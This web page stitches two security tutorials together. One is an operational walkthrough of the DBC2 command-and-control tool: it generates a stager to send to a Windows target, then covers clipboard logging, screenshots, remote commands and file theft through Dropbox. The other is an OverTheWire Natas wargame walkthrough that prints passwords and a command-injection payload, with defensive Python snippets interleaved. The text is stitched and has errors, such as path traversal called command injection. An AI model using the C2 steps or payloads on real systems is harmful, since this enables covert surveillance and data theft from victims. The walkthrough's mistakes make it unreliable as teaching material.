Command and Control with DropboxC2


In this article, we will learn how to use the DropboxC2 tool, also known as DBC2.
Table of Content:
Introduction
Installation
Getting Dropbox API
Exploiting Target
Sniffing Clipboard
Capturing Screenshot
Command Execution
File Download

Introduction
DBC2 is primarily a post-exploitation tool. It consists of an agent running on the target machine, a controller running on any machine, PowerShell modules, and Dropbox servers as the communication channel between agent and controller. It is inspired by the PowerShell Empire framework and is written in Python. Credit for developing this tool goes to Arno0x0x.
For this particular demonstration,
Attacker: Kali Linux
Target: Windows 10
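As an added defender-side example, not part of the original article or the DBC2 project: because the agent described above talks only to Dropbox, it shows up in endpoint telemetry as an unexpected process contacting the Dropbox API hosts at machine-regular intervals. The Python below flags that pattern over constructed connection events (the host names, process paths and timestamps are made up; the field layout is modelled on Sysmon Event ID 3 network-connection records, and the set of sanctioned Dropbox client images is an assumption).

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample events, one per line: timestamp|host|process image|destination host.
# Made up for this example; a real feed would be Sysmon Event ID 3 or an EDR equivalent.
EVENTS = r"""
2024-01-05T10:00:00|WS01|C:\Users\bob\AppData\Local\Temp\dbc2_agent.exe|api.dropboxapi.com
2024-01-05T10:00:00|WS01|C:\Program Files\Mozilla Firefox\firefox.exe|www.example.org
2024-01-05T10:00:31|WS01|C:\Users\bob\AppData\Local\Temp\dbc2_agent.exe|api.dropboxapi.com
2024-01-05T10:01:00|WS01|C:\Users\bob\AppData\Local\Temp\dbc2_agent.exe|content.dropboxapi.com
2024-01-05T10:01:30|WS01|C:\Users\bob\AppData\Local\Temp\dbc2_agent.exe|api.dropboxapi.com
2024-01-05T10:02:01|WS01|C:\Users\bob\AppData\Local\Temp\dbc2_agent.exe|api.dropboxapi.com
2024-01-05T09:12:07|WS02|C:\Program Files (x86)\Dropbox\Client\Dropbox.exe|api.dropboxapi.com
2024-01-05T09:58:40|WS02|C:\Program Files (x86)\Dropbox\Client\Dropbox.exe|content.dropboxapi.com
2024-01-05T11:40:51|WS02|C:\Program Files (x86)\Dropbox\Client\Dropbox.exe|api.dropboxapi.com
2024-01-05T11:41:22|WS02|C:\Program Files (x86)\Dropbox\Client\Dropbox.exe|api.dropboxapi.com
"""

DROPBOX_API_SUFFIX = "dropboxapi.com"   # api.dropboxapi.com, content.dropboxapi.com, ...
EXPECTED_IMAGES = {"dropbox.exe"}        # assumption: the only sanctioned Dropbox API client
MIN_EVENTS = 4                           # fewer samples cannot establish a cadence
MAX_JITTER = 0.2                         # stdev/mean of the gaps; polling loops sit well below

def parse_events(text):
    """Yield (timestamp, host, image, destination) from the pipe-separated event lines."""
    for line in text.strip().splitlines():
        ts, host, image, dest = line.split("|")
        yield datetime.fromisoformat(ts), host, image, dest

def find_dropbox_beacons(text):
    """Return sorted (host, image, mean_gap_seconds) for processes outside EXPECTED_IMAGES
    that contact Dropbox API hosts at least MIN_EVENTS times with near-constant spacing."""
    contacts = defaultdict(list)
    for ts, host, image, dest in parse_events(text):
        if dest.endswith(DROPBOX_API_SUFFIX):
            contacts[(host, image)].append(ts)
    flagged = []
    for (host, image), times in contacts.items():
        basename = image.rsplit("\\", 1)[-1].lower()
        if basename in EXPECTED_IMAGES or len(times) < MIN_EVENTS:
            continue   # sanctioned client, or too few samples to judge
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= MAX_JITTER:
            flagged.append((host, image, mean))
    return sorted(flagged)
```

The sanctioned Dropbox.exe on WS02 is skipped by the allowlist even though it has enough events; the agent on WS01 is flagged because its gaps are all within a second of 30 s.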
Installation
To begin, we need the tool on our attacker machine, so we clone it directly from GitHub.
git clone https://github.com/Arno0x/DBC2


After running the above command, we have a directory named DBC2. We move into that directory using the cd command and then install the tool's dependencies. There are multiple ways to do this; here we use pip with the requirements.txt file that came with the clone.
cd DBC2/
pip install -r requirements.txt


Getting Dropbox API
This tool uses Dropbox servers as the medium for communicating with agents on the target machine, so it requires a Dropbox API access token. To get one, first create a Dropbox account, then head to the developer tools here. A webpage similar to the one shown below opens. Here we select “Dropbox API”, then choose “App folder” in the type of access section. Name the app as you like, then click the Create App button to proceed.


This leads to another webpage as shown below. Here, move on to the OAuth 2 section and generate an access token. This token is the Dropbox API credential required for this practical.






Copy the generated access token and return to the directory we cloned earlier. It contains a file named config.py. Open it with the nano command and paste the access token as the value of “defaultAccessToken”, as shown in the screenshot below.

Exploiting Target
Now it’s time to run the tool; check that you have the appropriate permissions before running it. As we run the tool, we are greeted with a cool-looking banner as shown below, followed by some details about the author, version and tool. It then asks for a master password, which is used to encrypt all data exchanged between the agents and the controller. Enter a password of your choice. The tool encrypts the password entered and displays the result; we can copy the code shown into config.py so that it doesn’t ask for the master password again. After this it creates an incoming directory inside the directory we cloned earlier, which is used as a buffer to save files retrieved from the target.
python dropboxC2.py



The tool requires the modules and stage to be uploaded to Dropbox before proceeding further. We do this with the command given below.
publishStage dbc2_agent.exe


This uploads a file to Dropbox as shown in the image below. The file is encrypted using XOR.
Now let’s check that the stage is published, using the command given below:
listPublishedStage


Now that the stage is uploaded, let’s use it to create a stager. We are going to create a batch file, but many other stager types are available: the tool provides stagers as a macro, a one-liner, JavaScript, MSBuild, SCT and more. This command creates stager.bat in the tmp directory. We then send this batch file to our target machine.
genStager batch default


After the batch file is executed on the target machine, a message on the terminal informs us that an agent was found, along with its ID. We use the list command to see the list of agents, then copy the AgentID and use it to interact with the session as shown in the image.
list
use [AgentID]


This creates a file on Dropbox with the .status extension, as shown in the image.


Clipboard Sniffing
We can retrieve the data on the target’s clipboard, that is, whatever they have copied. To do this we start a sniffer with the command clipboardLogger start, wait until the target copies some data, then stop the sniffer with the command clipboardLogger stop. After stopping the sniffer, the clipboard contents are saved in a text file inside the incoming directory.
clipboardLogger start
clipboardLogger stop


Let’s take a look at what the target copied. We use the cat command in a new Kali terminal to read the file, as shown in the image.
cat /root/DBC2/incoming/clipboardlogger.txt


Capturing Screenshot
Furthermore, we can grab a screenshot of the target machine. To do this we use the screenshot command as shown in the image.
screenshot


The screenshot is captured and stored in the incoming directory. In the image we can see that the target is browsing a website.


Command Execution
We can run PowerShell commands on the target machine using the cmd command. The tool doesn’t offer an interactive shell, but it can execute one command at a time. So we type cmd and it asks for the command to execute. Here we run dir and get the list of files shown in the image.
cmd
dir

File Download
Furthermore, we can download files from the target. To do this we use the command getFile followed by the file name or path. This downloads the file from the target to our attacker machine.
getFile sharetext.txt


The tool downloads the file into the incoming directory discussed earlier. We can view it using the cat command as shown in the image below.
cat /root/DBC2/incoming/sharetext.txt


OverTheWire – Natas Walkthrough (1-10)


Today we will play a war-game called Natas, hosted by the OverTheWire organization. It has a collection of 34 levels, is aimed at absolute beginners, and teaches the basics of server-side web security in a fun and challenging way. To play this war-game, go to the Natas website by clicking here.
Objective
Find the password to login on to the next level.
Table of Content:
Introduction
Level 0
Level 0 → Level 1
Level 1 → Level 2
Level 2 → Level 3
Level 3 → Level 4
Level 4 → Level 5
Level 5 → Level 6
Level 6 → Level 7
Level 7 → Level 8
Level 8 → Level 9
Level 9 → Level 10

Introduction
Natas levels are designed so that each level is a different website. To reach each website we enter a URL in this format:
http://natasX.natas.labs.overthewire.org, where X is the level number.
To access a level, we use the username for that level (e.g. natas0 for level 0) and its password. The password for the next level is hidden somewhere in the current level, so we have to enumerate it. All the passwords are stored at /etc/natas_webpass/.
Level 0

This is a pretty simple level. The login credentials are given on the Natas introduction page. Just browse to the URL given below and enter them.
Username: natas0
Password: natas0

Level 0 → Level 1

On successfully logging in to the natas0 webpage, we see the message “You can find the password for the next level on this page”, as shown in the figure below.


Now, as per convention, let’s look inside the source code. To view it, right-click on the webpage and select ‘View Page Source’. There we have the password commented in the source code.

Level 1 → Level 2

We use the credentials extracted from the previous level to log in to Level 1.
Username: natas1
Password: gtVrDuiDfck831PqWsLEZy5gyDz1clto

On successfully logging in to the natas1 webpage, we see the message “You can find the password for the next level on this page, but rightclicking has been blocked!”, as shown in the figure below.


Now that right-clicking is disabled, we need another way to view the source code and retrieve the password from it. We were using Mozilla Firefox, where the ‘Ctrl + U’ shortcut opens the source. There we have the password commented in the source code.

Level 2 → Level 3
We use the credentials extracted from the previous level to log in to Level 2.
URL: http://natas2.natas.labs.overthewire.org
Username: natas2
Password: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

On successfully logging in to the natas2 webpage, we see the message “There is nothing on this page”, as shown in the figure below.

So we check the source code of the page, where we find an image file named pixel.png located in the files directory.

We open the files directory as shown in the image below. In this directory we find the user.txt file.

On opening it we find the passwords for various users present on the target machine, including the one we need for natas3.

Level 3 → Level 4
We use the credentials extracted from the previous level to log in to Level 3.
URL: http://natas3.natas.labs.overthewire.org
Username: natas3
Password: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
On successfully logging in to the natas3 webpage, we see the message “There is nothing on this page”, as shown in the figure below.

So we check the source code of the page, where we find a commented hint: "Not even Google will find it this time". Search engine spiders skip the links that are disallowed in the robots.txt file, so we check whether this website has one.

We open robots.txt as shown in the image below. In this file we find that the /s3cr3t/ directory is disallowed, so let’s open it and see for ourselves what’s inside.


In this directory, we find the user.txt file.

On opening it we find the login credentials of the user natas4.

Level 4 → Level 5
We use the credentials extracted from the previous level to log in to Level 4.
URL: http://natas4.natas.labs.overthewire.org
Username: natas4
Password: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
On successfully logging in to the natas4 webpage, we see the message “Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"”, as shown in the figure below.

We capture the request in Burp Suite, where we see a header named Referer. Its value refers to natas4.

We change that Referer value to natas5 as shown in the image below.

After forwarding the request, we get the credentials of the user natas5.

Level 5 → Level 6
We use the credentials extracted from the previous level to log in to Level 5.
URL: http://natas5.natas.labs.overthewire.org
Username: natas5
Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
On successfully logging in to the natas5 webpage, we see the message “Access disallowed. You are not logged in”, as shown in the figure below.

We capture the request in Burp Suite, where we see a parameter named loggedin. It is set to 0.

We change that loggedin value to 1 as shown in the image below.

After forwarding the request, we get the credentials of the user natas6.



Level 6 → Level 7
We use the credentials extracted from the previous level to log in to Level 6.
URL: http://natas6.natas.labs.overthewire.org
Username: natas6
Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
On successfully logging in to the natas6 webpage, we see a form labelled "Input secret:", as shown in the figure below.

We went ahead and looked for clues about the secret we have to enter to get the credentials for the next level. Here we see that a file called 'secret.inc' is included.

So, to grab the secret, we browse to the included file manually: as shown in the image, we add /include/secret.inc to the URL. This gives a blank page in response, so we view the source code and find the secret in a comment on the page.


Now we copy the secret and go back to the form that asked for it. After entering the secret, we get the login credentials for the next level.

Level 7 → Level 8
We use the credentials extracted from the previous level to log in to Level 7.
URL: http://natas7.natas.labs.overthewire.org
Username: natas7
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
On successfully logging in to the natas7 webpage, we are given two links, Home and About, as shown in the figure below.

So we check the source code of the page.
Here we can see links of the form "index.php?page=" in the image. The source also hints at the location of the password: /etc/natas_webpass/natas8.

As shown in the image, this link appears in the address bar of our browser after clicking the Home link.




So, we modify the link to read the password stored in the natas_webpass.
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
And we have the password for the next level. This is called command injection.
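An added example, not from the original walkthrough: the lesson of this level is that the page parameter names the file the server loads, so a value like /etc/natas_webpass/natas8 makes it read a file it was never meant to serve. The Python below contrasts a lookup that trusts the parameter with one that only accepts names from a fixed map and verifies the resolved path stays inside the pages directory. The directory /srv/site/pages and the page names are assumptions for the example.

```python
import os

PAGES_DIR = "/srv/site/pages"          # assumption: where the site's page templates live
ALLOWED_PAGES = {"home": "home.php", "about": "about.php"}   # assumed page names


def resolve_page_unsafe(page: str) -> str:
    """Mirror of trusting ?page= directly: os.path.join discards PAGES_DIR as soon as the
    user supplies an absolute path, and '..' segments walk out of it."""
    return os.path.normpath(os.path.join(PAGES_DIR, page))


def is_contained(page: str) -> bool:
    """True if the trusting resolver would still stay inside PAGES_DIR for this value."""
    return os.path.commonpath([PAGES_DIR, resolve_page_unsafe(page)]) == PAGES_DIR


def resolve_page_safe(page: str) -> str:
    """Map the request to a known file, then prove the result is still under PAGES_DIR."""
    filename = ALLOWED_PAGES.get(page)
    if filename is None:
        raise ValueError(f"unknown page: {page!r}")
    base = os.path.realpath(PAGES_DIR)
    path = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("resolved path escapes the pages directory")
    return path
```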

Level 8 → Level 9
We use the credentials extracted from the previous level to log in to Level 8.
URL: http://natas8.natas.labs.overthewire.org
Username: natas8
Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
On successfully logging in to the natas8 webpage, we see a form labelled "Input secret:", as shown in the figure below.

We open the source code and find that the secret is stored in encoded form, together with the function that encodes it.

Hence, to decode the secret we just apply the inverse of that function, as shown in the image.
php -a
echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));

Now that we have the decoded secret, we use it to extract the credentials from the natas8 webpage, as shown in the image.
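An added example, not from the original walkthrough: a Python port of the decoder run above in php -a, together with the encoder it inverts (assumed to be bin2hex(strrev(base64_encode($secret))), the mirror image of the decoder). The point it makes is that a keyless, reversible transformation is obfuscation, not protection: anyone who can read the source can invert it. The hex value is the one quoted above.

```python
import base64
import binascii

# Encoded secret as quoted in the article (the value passed to hex2bin above).
ENCODED_SECRET_HEX = "3d3d516343746d4d6d6c315669563362"


def encode_secret(secret: str) -> str:
    """Port of the level's encoder, assumed to be bin2hex(strrev(base64_encode($secret))).
    Every step is a fixed, keyless transformation, so the output leaks the input."""
    b64 = base64.b64encode(secret.encode("utf-8")).decode("ascii")
    return binascii.hexlify(b64[::-1].encode("ascii")).decode("ascii")


def decode_secret(encoded_hex: str) -> str:
    """Apply the inverse steps in reverse order, matching the article's
    base64_decode(strrev(hex2bin(...))) one-liner."""
    reversed_b64 = binascii.unhexlify(encoded_hex).decode("ascii")
    return base64.b64decode(reversed_b64[::-1]).decode("utf-8")


def round_trips(secret: str) -> bool:
    """True when decode(encode(secret)) returns the input: no information is hidden."""
    return decode_secret(encode_secret(secret)) == secret
```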

Level 9 → Level 10
We use the credentials extracted from the previous level to log in to Level 9.
URL: http://natas9.natas.labs.overthewire.org
Username: natas9
Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
On successfully logging in to the natas9 webpage, we see a form labelled "Find words containing", as shown in the figure below.

We open the source code and find that the keyword we enter is passed to a function called passthru(). It takes the value in $key and executes it directly.

So we use a semicolon (;) to run a second command and try to read the password for the next level.
;cat /etc/natas_webpass/natas10

The password is printed on the screen, as shown in the image.

Level 10 → Level 11
We use the credentials extracted from the previous level to log in to Level 10.
URL: http://natas10.natas.labs.overthewire.org
Username: natas10
Password: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
On successfully logging in to the natas10 webpage, we see the message “For security reasons, we now filter on certain characters” above the "Find words containing" form, as shown in the figure below.

We open the source code and find that, as before, the keyword is passed to passthru() via $key, but now the input is filtered for the characters (/;|&), as shown in the image.

So, instead we use (.*) and try to read the password for the next level.
.*/etc/natas_webpass/natas10

The password is printed on the screen, as shown in the image.
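An added example covering levels 9 and 10, not from the original walkthrough: assuming the backend splices $key unquoted into a grep over a word list, the Python below shows why the level 10 character blocklist is not a fix. The blocklist here rejects ;, | and & (an assumption: the article's own working payload contains a slash, so the slash in its character list is taken to be the regex delimiter rather than a filtered character). The level 9 payload is caught, but the level 10 payload contains none of the blocked characters and reaches the shell untouched. The hardened version accepts only a plain word and passes it as a separate argument, so no shell ever interprets user text. The word-list name is an assumption.

```python
import re

# Level 10 style filter as assumed in the lead-in: reject any key containing ; | or &.
BLOCKLIST = re.compile(r"[;|&]")
# Allowlist for a "find words containing" feature: letters only, bounded length.
ALLOWLIST = re.compile(r"[A-Za-z]{1,32}")
WORDLIST = "dictionary.txt"                # assumed name of the word list the backend searches

LEVEL9_PAYLOAD = ";cat /etc/natas_webpass/natas10"     # chains a second command with ;
LEVEL10_PAYLOAD = ".*/etc/natas_webpass/natas10"       # no ; | or &, so the blocklist is blind to it


def blocklist_allows(key: str) -> bool:
    """Level 10's approach: a key is accepted unless it contains a blocked character."""
    return BLOCKLIST.search(key) is None


def vulnerable_shell_line(key: str) -> str:
    """The command string the shell receives when $key is spliced in unquoted (the level 9 form).
    Returned rather than executed so the example stays side-effect free."""
    return f"grep -i {key} {WORDLIST}"


def allowlist_allows(key: str) -> bool:
    """Hardened check: accept only what a dictionary lookup legitimately needs."""
    return ALLOWLIST.fullmatch(key) is not None


def safe_argv(key: str) -> list:
    """Argument vector for subprocess.run(argv) with shell=False: the key is one argument,
    '--' stops grep option parsing, and no shell ever interprets the user's text."""
    if not allowlist_allows(key):
        raise ValueError("search term rejected")
    return ["grep", "-i", "--", key, WORDLIST]


def classify(key: str) -> dict:
    """Summarise how each defence treats a key, for the two payloads and normal input."""
    return {"blocklist": blocklist_allows(key), "allowlist": allowlist_allows(key)}
```

Note that even a harmless-looking key such as -r passes the blocklist yet would be parsed by grep as an option; the allowlist plus the `--` separator closes that gap too.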